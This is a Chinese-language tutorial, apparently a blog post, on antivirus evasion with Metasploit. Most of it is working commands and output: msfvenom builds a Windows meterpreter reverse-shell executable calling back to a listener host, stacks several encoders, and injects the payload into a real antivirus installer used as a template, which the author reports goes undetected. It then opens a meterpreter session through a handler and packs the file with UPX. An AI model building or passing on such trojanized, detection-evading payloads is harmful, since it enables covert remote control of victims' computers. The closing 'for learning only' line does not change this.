前言
本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件
一、免杀
免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描
1.msfvenom的使用
┌──(root💀kali)-[~]
└─# msfvenom info
Error: No options
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
有几个比较重要的参数:
- -p:使用那个攻击载荷,可以通过-l payloads查看所有攻击载荷
- -f:输出格式,linux是elf,windows是exe
- -o:输出文件名
- -e:指定编码器,可以通过-l encoders查看所有编码器
- -i:编码次数
- -a:设置目标的指令集架构,这里我们选择x86即可
- –platform:设置目标平台,这里是windows,可以通过–help-platforms选项查看msfvenom支持的所有平台
- -k:该选项可以保留模版原来的功能,将payload作为一个新的线程来注入,但不能保证可以用在所有可执行程序上
- -x:指定模版
例如创建一个windows反弹meterpreter攻击载荷:
┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhosts=192.168.1.113 lport=3333 -e cmd/echo -i 10 -f exe -o cmd_echo_113_3333_10.exe 1 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of cmd/echo
cmd/echo succeeded with size 354 (iteration=0)
cmd/echo succeeded with size 354 (iteration=1)
cmd/echo succeeded with size 354 (iteration=2)
cmd/echo succeeded with size 354 (iteration=3)
cmd/echo succeeded with size 354 (iteration=4)
cmd/echo succeeded with size 354 (iteration=5)
cmd/echo succeeded with size 354 (iteration=6)
cmd/echo succeeded with size 354 (iteration=7)
cmd/echo succeeded with size 354 (iteration=8)
cmd/echo succeeded with size 354 (iteration=9)
cmd/echo chosen with final size 354
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: cmd_echo_113_3333_10.exe
-p表示使用windows/meterpreter/reverse_tcp攻击载荷,lhosts=192.168.1.113 lport=3333是主机监控ip和端口,-e 表示使用cmd/echo编码格式,-i表示编码10次
使用火绒安全进行检测,很容易被检测到
2.多重编码
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.1.113 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f exe -o payload2.0.exe
┌──(root💀kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.1.113 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -f exe -o payload2.0.exe
Attempting to read payload from STDIN...
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
...
x86/shikata_ga_nai chosen with final size 894
Payload size: 894 bytes
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/alpha_upper
...
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
...
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 73802 bytes
Saved as: payload2.0.exe
x86/alpha_upper succeeded with size 985271 (iteration=9)
x86/alpha_upper chosen with final size 985271
Payload size: 985271 bytes
这里使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码20次,接着来10次的alpha_upper编码,再来10次的countdown编码,最后才生成可执行文件,这次也可以被检测到
使用模板
这次前面不变,最后使用一个火绒的安装包为模板进行生成
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.1.113 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x /root/桌面/sysdiag-full-5.0.61.1-20210605.exe -k -f exe > payload3.exe
┌──(root💀kali)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.1.113 LPORT=3333 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x /root/桌面/sysdiag-full-5.0.61.1-20210605.exe -k -f exe > payload3.exe
使用模板后的攻击载荷,已经无法被检测到了,nice!
运行攻击载荷,可以看到火绒的安装界面,并在主机使用主控端handler,可以连接到靶机
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > setg lhost 192.168.1.113
msf6 exploit(multi/handler) > set lport 3333
lport => 3333
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:3333
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:3333 -> 192.168.1.106:1682) at 2021-06-06 12:58:24 +0800
meterpreter > background
[*] Backgrounding session 1...
二、加壳
加壳是一类能够对可执行文件进行加密压缩并将解压代码嵌入其中的工具,当加壳的文件被运行后,解压代码会从已压缩的数据中重建原始程序并运行
1.upx的使用
┌──(root💀kali)-[~]
└─# upx
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
Commands:
-1 compress faster -9 compress better
-d decompress -l list compressed file
-t test compressed file -V display version number
-h give more help -L display software license
Options:
-q be quiet -v be verbose
-oFILE write output to 'FILE'
-f force compression of suspicious files
-k keep backup files
file.. executables to (de)compress
Type 'upx --help' for more detailed help.
UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io
先使用-5对文件进行加壳
┌──(root💀kali)-[~]
└─# upx -5 payload2.0.exe 1 ⨯
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
File size Ratio Format Name
-------------------- ------ ----------- -----------
73802 -> 48128 65.21% win32/pe payload2.0.exe
Packed 1 file.
本人对第二代payload2.exe进行加壳测试后,发现还是可以被检测到,但是检测的时间和数量有明显的增加
总结
本文详细介绍了msfvenom的使用,以及对攻击载荷进行免杀、加壳的过程,仅供学习。